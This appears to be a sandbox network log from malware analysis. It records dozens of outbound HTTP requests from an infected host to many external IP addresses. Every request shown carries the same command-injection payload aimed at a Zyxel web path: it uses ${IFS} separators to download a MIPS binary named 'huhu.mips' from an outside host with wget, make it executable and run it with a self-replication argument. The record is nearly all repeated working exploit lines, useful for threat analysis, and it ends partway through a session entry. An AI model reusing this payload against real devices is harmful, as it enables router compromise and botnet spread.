                                                      Feb 2, 2024 06:35:38.332600117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      766192.168.2.14382904.57.192.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332632065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      767192.168.2.145476041.131.6.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332700014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      768192.168.2.1452588206.133.149.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332773924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      769192.168.2.1449020176.142.253.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332827091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      770192.168.2.1438742197.126.76.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332858086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      771192.168.2.1440032143.222.29.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332926035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      772192.168.2.1456790160.45.91.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332964897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      773192.168.2.1438008194.30.253.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333033085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      774192.168.2.1449574122.105.14.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333084106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      775192.168.2.145991260.110.66.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333163023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      776192.168.2.1435368166.214.237.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333213091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      777192.168.2.1443680121.50.242.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333285093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      778192.168.2.144421057.143.19.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333337069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      779192.168.2.1452536138.106.245.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333393097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      780192.168.2.1448928101.252.206.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333447933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      781192.168.2.145012672.154.150.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333487034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      782192.168.2.145260274.110.226.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333543062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      783192.168.2.1437658124.208.232.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333578110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      784192.168.2.144413281.179.206.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333621979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      785192.168.2.1453484130.48.222.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333666086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      786192.168.2.1438364121.66.12.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333735943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      787192.168.2.144163244.73.0.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333808899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      788192.168.2.1442830192.16.227.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333851099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      789192.168.2.1443412108.131.164.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333910942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      790192.168.2.1457956140.112.210.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.333956003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      791192.168.2.1452002163.56.237.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334043026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      792192.168.2.146008084.22.10.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334110975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      793192.168.2.1435460119.30.39.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334176064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      794192.168.2.1448596171.44.233.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334247112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      795192.168.2.1442488207.132.10.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334278107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      796192.168.2.1438918184.246.151.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334320068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      797192.168.2.1445904143.204.112.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334362030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      798192.168.2.145490427.91.243.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334424019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      799192.168.2.1451364186.192.29.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334507942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      800192.168.2.145009634.81.31.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334562063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      801192.168.2.1444048114.180.23.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334646940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      802192.168.2.1460754171.26.123.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334705114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      803192.168.2.1445702115.54.84.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334748030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      804192.168.2.1437648114.158.141.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334803104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      805192.168.2.1441476217.215.147.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334857941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      806192.168.2.1452960211.15.91.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334925890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      807192.168.2.14532285.81.146.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334953070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      808192.168.2.1449856106.222.219.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.334990978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      809192.168.2.1454088106.155.190.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335041046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      810192.168.2.144869078.195.118.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335113049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      811192.168.2.144915641.139.47.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335124969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      812192.168.2.144325665.134.106.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335164070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      813192.168.2.1451522119.126.112.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335237026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      814192.168.2.1457640107.255.127.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335299015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      815192.168.2.143413820.141.28.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335355997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      816192.168.2.144070864.41.113.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335407019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      817192.168.2.1437006169.3.83.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335469007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      818192.168.2.1448652166.120.151.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335541010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      819192.168.2.1438148154.51.128.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335608006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      820192.168.2.1448612200.26.207.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335664034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      821192.168.2.1449884172.248.203.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335700989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      822192.168.2.143679295.40.95.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335733891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      823192.168.2.1436978124.247.10.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335767984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      824192.168.2.1441714217.39.240.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335805893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      825192.168.2.143682477.241.242.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335846901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      826192.168.2.145026237.133.21.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335906982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      827192.168.2.1458514156.27.201.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.335963964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      828192.168.2.145757666.200.163.182443
                                                      TimestampBytes transferredDirectionData
